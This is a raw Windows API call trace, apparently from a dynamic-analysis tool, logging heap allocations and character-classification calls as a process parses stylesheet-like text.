IsCharSpaceW (wch=0x70) returned 0 [0227.709] IsCharSpaceW (wch=0x70) returned 0 [0227.709] IsCharSpaceW (wch=0x78) returned 0 [0227.709] IsCharSpaceW (wch=0x0) returned 0 [0227.709] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5e1cd0, Size=0x90) returned 0x5c9220 [0227.709] IsCharSpaceW (wch=0x31) returned 0 [0227.709] IsCharSpaceW (wch=0x70) returned 0 [0227.709] IsCharSpaceW (wch=0x70) returned 0 [0227.709] IsCharSpaceW (wch=0x78) returned 0 [0227.709] IsCharSpaceW (wch=0x0) returned 0 [0227.709] IsCharSpaceW (wch=0x31) returned 0 [0227.709] IsCharSpaceW (wch=0x70) returned 0 [0227.709] IsCharSpaceW (wch=0x70) returned 0 [0227.709] IsCharSpaceW (wch=0x78) returned 0 [0227.709] IsCharSpaceW (wch=0x0) returned 0 [0227.709] IsCharSpaceW (wch=0x31) returned 0 [0227.709] IsCharSpaceW (wch=0x70) returned 0 [0227.709] IsCharSpaceW (wch=0x70) returned 0 [0227.709] IsCharSpaceW (wch=0x78) returned 0 [0227.709] IsCharSpaceW (wch=0x0) returned 0 [0227.709] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5c9220, Size=0xd0) returned 0x5f3400 [0227.709] IsCharSpaceW (wch=0x0) returned 0 [0227.709] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5f9b08 | out: hHeap=0x590000) returned 1 [0227.709] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.709] IsCharSpaceW (wch=0x3a) returned 0 [0227.709] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.709] IsCharSpaceW (wch=0x20) returned 1 [0227.709] IsCharSpaceW (wch=0x32) returned 0 [0227.709] IsCharAlphaNumericW (ch=0x32) returned 1 [0227.709] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.709] IsCharSpaceW (wch=0x3b) returned 0 [0227.709] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.709] IsCharSpaceW (wch=0xd) returned 1 [0227.709] IsCharSpaceW (wch=0xa) returned 1 [0227.709] IsCharSpaceW (wch=0x20) returned 1 [0227.709] IsCharSpaceW (wch=0x20) returned 1 [0227.710] IsCharSpaceW (wch=0x20) returned 1 [0227.710] IsCharSpaceW (wch=0x20) returned 1 [0227.710] IsCharSpaceW (wch=0x20) returned 1 [0227.710] IsCharSpaceW (wch=0x20) returned 1 [0227.710] IsCharSpaceW (wch=0x20) returned 1 [0227.710] IsCharSpaceW (wch=0x20) returned 1 [0227.710] IsCharSpaceW (wch=0x62) returned 0 [0227.710] IsCharSpaceW (wch=0x78) returned 0 [0227.710] IsCharSpaceW (wch=0x32) returned 0 [0227.710] IsCharSpaceW (wch=0x32) returned 0 [0227.710] IsCharSpaceW (wch=0x70) returned 0 [0227.710] IsCharSpaceW (wch=0x70) returned 0 [0227.710] IsCharSpaceW (wch=0x78) returned 0 [0227.710] IsCharSpaceW (wch=0x0) returned 0 [0227.710] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.710] IsCharSpaceW (wch=0x3a) returned 0 [0227.710] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.710] IsCharSpaceW (wch=0x20) returned 1 [0227.710] IsCharSpaceW (wch=0x23) returned 0 [0227.710] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.710] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.710] IsCharSpaceW (wch=0x3b) returned 0 [0227.710] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.710] IsCharSpaceW (wch=0xd) returned 1 [0227.710] IsCharSpaceW (wch=0xa) returned 1 [0227.710] IsCharSpaceW (wch=0x20) returned 1 [0227.710] IsCharSpaceW (wch=0x20) returned 1 [0227.710] IsCharSpaceW (wch=0x20) returned 1 [0227.710] IsCharSpaceW (wch=0x20) returned 1 [0227.710] IsCharSpaceW (wch=0x20) returned 1 [0227.710] IsCharSpaceW (wch=0x20) returned 1 [0227.710] IsCharSpaceW (wch=0x7d) returned 0 [0227.710] IsCharSpaceW (wch=0x44) returned 0 [0227.710] IsCharSpaceW (wch=0x23) returned 0 [0227.710] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5f9b08 [0227.710] IsCharSpaceW (wch=0x23) returned 0 [0227.710] IsCharSpaceW (wch=0x23) returned 0 [0227.710] IsCharSpaceW (wch=0x45) returned 0 [0227.710] IsCharSpaceW (wch=0x44) returned 0 [0227.710] IsCharSpaceW (wch=0x45) returned 0 [0227.710] IsCharSpaceW (wch=0x44) returned 0 [0227.710] IsCharSpaceW (wch=0x45) returned 0 [0227.710] IsCharSpaceW (wch=0x44) returned 0 [0227.711] IsCharSpaceW (wch=0x23) returned 0 [0227.711] IsCharSpaceW (wch=0x30) returned 0 [0227.711] IsCharSpaceW (wch=0x25) returned 0 [0227.711] IsCharSpaceW (wch=0x25) returned 0 [0227.711] IsCharSpaceW (wch=0x0) returned 0 [0227.711] IsCharSpaceW (wch=0x30) returned 0 [0227.711] IsCharSpaceW (wch=0x25) returned 0 [0227.711] IsCharSpaceW (wch=0x25) returned 0 [0227.711] IsCharSpaceW (wch=0x0) returned 0 [0227.711] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2) returned 0x5db738 [0227.711] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5f3400, Size=0x130) returned 0x5ca480 [0227.711] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5f9b08 | out: hHeap=0x590000) returned 1 [0227.711] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.711] IsCharSpaceW (wch=0xd) returned 1 [0227.711] IsCharSpaceW (wch=0xa) returned 1 [0227.711] IsCharSpaceW (wch=0x9) returned 1 [0227.711] IsCharSpaceW (wch=0x20) returned 1 [0227.711] IsCharSpaceW (wch=0x20) returned 1 [0227.711] IsCharSpaceW (wch=0x69) returned 0 [0227.711] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5f9b08 [0227.711] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5f9b20 [0227.711] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.711] IsCharSpaceW (wch=0x20) returned 1 [0227.711] IsCharSpaceW (wch=0x7b) returned 0 [0227.711] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x605098 [0227.711] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.711] IsCharSpaceW (wch=0x20) returned 1 [0227.711] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.711] IsCharSpaceW (wch=0xd) returned 1 [0227.711] IsCharSpaceW (wch=0xa) returned 1 [0227.711] IsCharSpaceW (wch=0x9) returned 1 [0227.711] IsCharSpaceW (wch=0x9) returned 1 [0227.711] IsCharSpaceW (wch=0x64) returned 0 [0227.711] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5fc5e0 | out: hHeap=0x590000) returned 1 [0227.711] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.711] IsCharSpaceW (wch=0x3a) returned 0 [0227.712] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x5c4438 [0227.712] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.712] IsCharSpaceW (wch=0x69) returned 0 [0227.712] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.712] IsCharSpaceW (wch=0x3b) returned 0 [0227.712] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.712] IsCharSpaceW (wch=0xd) returned 1 [0227.712] IsCharSpaceW (wch=0xa) returned 1 [0227.712] IsCharSpaceW (wch=0x9) returned 1 [0227.712] IsCharSpaceW (wch=0x20) returned 1 [0227.712] IsCharSpaceW (wch=0x20) returned 1 [0227.712] IsCharSpaceW (wch=0x7d) returned 0 [0227.712] IsCharSpaceW (wch=0x6b) returned 0 [0227.712] IsCharSpaceW (wch=0x69) returned 0 [0227.712] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x6050b8 [0227.712] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x5dd1b0 [0227.712] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.712] IsCharSpaceW (wch=0xd) returned 1 [0227.712] IsCharSpaceW (wch=0xa) returned 1 [0227.712] IsCharSpaceW (wch=0x20) returned 1 [0227.712] IsCharSpaceW (wch=0x20) returned 1 [0227.712] IsCharSpaceW (wch=0x20) returned 1 [0227.712] IsCharSpaceW (wch=0x20) returned 1 [0227.712] IsCharSpaceW (wch=0x20) returned 1 [0227.712] IsCharSpaceW (wch=0x20) returned 1 [0227.712] IsCharSpaceW (wch=0x2e) returned 0 [0227.712] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5f9b38 [0227.712] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.712] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x6050d8 [0227.712] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.712] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.712] IsCharSpaceW (wch=0x20) returned 1 [0227.712] IsCharSpaceW (wch=0x7b) returned 0 [0227.712] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x5db748 [0227.712] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x16) returned 0x6050f8 [0227.712] IsCharSpaceW (wch=0x20) returned 1 [0227.712] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.713] IsCharSpaceW (wch=0xd) returned 1 [0227.713] IsCharSpaceW (wch=0xa) returned 1 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x66) returned 0 [0227.713] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5fc5e0 | out: hHeap=0x590000) returned 1 [0227.713] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.713] IsCharSpaceW (wch=0x3a) returned 0 [0227.713] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x605858 [0227.713] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x62) returned 0 [0227.713] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.713] IsCharSpaceW (wch=0x3b) returned 0 [0227.713] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.713] IsCharSpaceW (wch=0xd) returned 1 [0227.713] IsCharSpaceW (wch=0xa) returned 1 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x20) returned 1 [0227.713] IsCharSpaceW (wch=0x7d) returned 0 [0227.713] IsCharSpaceW (wch=0x64) returned 0 [0227.713] IsCharSpaceW (wch=0x62) returned 0 [0227.713] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x605118 [0227.713] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x5dd1f8 [0227.713] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.714] IsCharSpaceW (wch=0xd) returned 1 [0227.714] IsCharSpaceW (wch=0xa) returned 1 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x2e) returned 0 [0227.714] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5f9b50 [0227.714] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x128) returned 0x5f3ed0 [0227.714] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4) returned 0x5db758 [0227.714] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.714] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x605138 [0227.714] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.714] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x7b) returned 0 [0227.714] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x5db768 [0227.714] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x16) returned 0x605158 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.714] IsCharSpaceW (wch=0xd) returned 1 [0227.714] IsCharSpaceW (wch=0xa) returned 1 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x20) returned 1 [0227.714] IsCharSpaceW (wch=0x62) returned 0 [0227.714] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5fc5e0 | out: hHeap=0x590000) returned 1 [0227.715] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.715] IsCharSpaceW (wch=0x3a) returned 0 [0227.715] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x605880 [0227.715] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.715] IsCharSpaceW (wch=0x20) returned 1 [0227.715] IsCharSpaceW (wch=0x23) returned 0 [0227.715] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.715] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.715] IsCharSpaceW (wch=0x3b) returned 0 [0227.715] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.715] IsCharSpaceW (wch=0xd) returned 1 [0227.715] IsCharSpaceW (wch=0xa) returned 1 [0227.715] IsCharSpaceW (wch=0x20) returned 1 [0227.715] IsCharSpaceW (wch=0x20) returned 1 [0227.715] IsCharSpaceW (wch=0x20) returned 1 [0227.715] IsCharSpaceW (wch=0x20) returned 1 [0227.715] IsCharSpaceW (wch=0x20) returned 1 [0227.715] IsCharSpaceW (wch=0x20) returned 1 [0227.715] IsCharSpaceW (wch=0x20) returned 1 [0227.715] IsCharSpaceW (wch=0x20) returned 1 [0227.715] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.715] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.715] IsCharAlphaNumericW (ch=0x32) returned 1 [0227.715] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.715] IsCharAlphaNumericW (ch=0x35) returned 1 [0227.716] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.716] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x605198 [0227.716] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.716] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x33) returned 1 [0227.716] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.716] IsCharAlphaNumericW (ch=0x35) returned 1 [0227.716] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x32) returned 1 [0227.717] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.717] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x6051f8 [0227.717] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.717] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.717] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.718] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.718] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.718] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x605258 [0227.718] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.718] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.718] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.719] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.719] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x6051d8 [0227.719] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.719] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.719] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.719] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.719] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.720] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x6052d8 [0227.720] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.720] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.720] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.720] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.721] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.721] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.721] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.721] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.721] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.721] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.721] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.721] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x605338 [0227.721] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.721] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.721] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.721] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5fc5e0 | out: hHeap=0x590000) returned 1 [0227.721] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x605358 [0227.721] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.721] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.721] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.721] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.722] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x33) returned 1 [0227.722] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x33) returned 1 [0227.722] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.722] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.722] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.723] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x6053b8 [0227.723] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.723] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.723] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5fc5e0 | out: hHeap=0x590000) returned 1 [0227.723] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x6053d8 [0227.723] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.723] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x23) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.723] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x605418 [0227.723] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.723] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.723] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.724] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.724] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x605478 [0227.724] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 [0227.724] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.724] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.724] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.724] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.724] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.725] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x6054d8 [0227.725] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc5e0 